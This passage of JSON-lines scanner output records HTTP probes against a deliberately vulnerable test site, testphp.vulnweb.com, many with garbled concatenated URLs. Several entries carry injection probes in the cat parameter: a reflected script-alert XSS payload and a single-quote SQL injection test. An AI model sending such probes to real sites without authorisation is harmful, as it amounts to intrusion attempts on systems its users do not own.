ords\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:46.034231484Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12\",\"time\":\"353.387138ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:46.090062259Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/\",\"time\":\"353.001389ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:46.19786265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13\",\"time\":\"353.50589ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:49.451410383Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/\",\"time\":\"349.500439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:49.564070971Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14\",\"time\":\"349.947535ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:49.641941481Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/\",\"time\":\"348.168778ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:49.709157123Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15\",\"time\":\"352.28693ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:50.079452432Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/\",\"time\":\"348.398796ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:50.445949243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/item.cgi?item\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/item.cgi?item\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en12.http://www.try2hack.nl/13.http://vicnum.ciphertechs.com/14.http://webappsecmovies.sourceforge.net/webgoat/15.http://www.target-website.com/cgi-bin/item.cgi?item\",\"time\":\"356.961363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:50.542335349Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123\",\"time\":\"358.518465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:50.724997025Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123%22\",\"time\":\"349.637966ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:51.189375631Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123%22%3E%3Cscript%3Ealert\",\"time\":\"354.700076ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4990,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:51.330913835Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E\\u0026zfdfasdf=124fffff\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E\\u0026zfdfasdf=124fffff\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E\\u0026zfdfasdf=124fffff\",\"time\":\"344.111644ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:52.993977486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123%22\\u0026\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123%22\",\"time\":\"343.466033ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:54.073679787Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\\u0026\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123\",\"time\":\"347.40718ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:54.333291508Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\\u0026zfdfasdf=124fff...\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\\u0026zfdfasdf=124fff...\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123\\u0026zfdfasdf=124fff...\",\"time\":\"348.793206ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:54.636533973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\\u0026zfdfasdf=124fffff\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123\\u0026zfdfasdf=124fffff\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123\\u0026zfdfasdf=124fffff\",\"time\":\"339.80762ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.434530586Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=123'\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=123'\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=123'\",\"time\":\"351.361272ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.521167085Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=13\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=13\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=13\",\"time\":\"357.644627ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.530364329Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=13Database\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=13Database\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=13Database\",\"time\":\"351.349497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4874,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.576526635Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulations\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulations\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=13DatabaseManipulations\",\"time\":\"357.841257ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4887,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.581907252Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulationsSQL\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulationsSQL\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=13DatabaseManipulationsSQL\",\"time\":\"349.368411ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4890,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.953366773Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=140\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=140\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=140\",\"time\":\"352.560292ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:55.973301363Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1A01\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1A01\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/h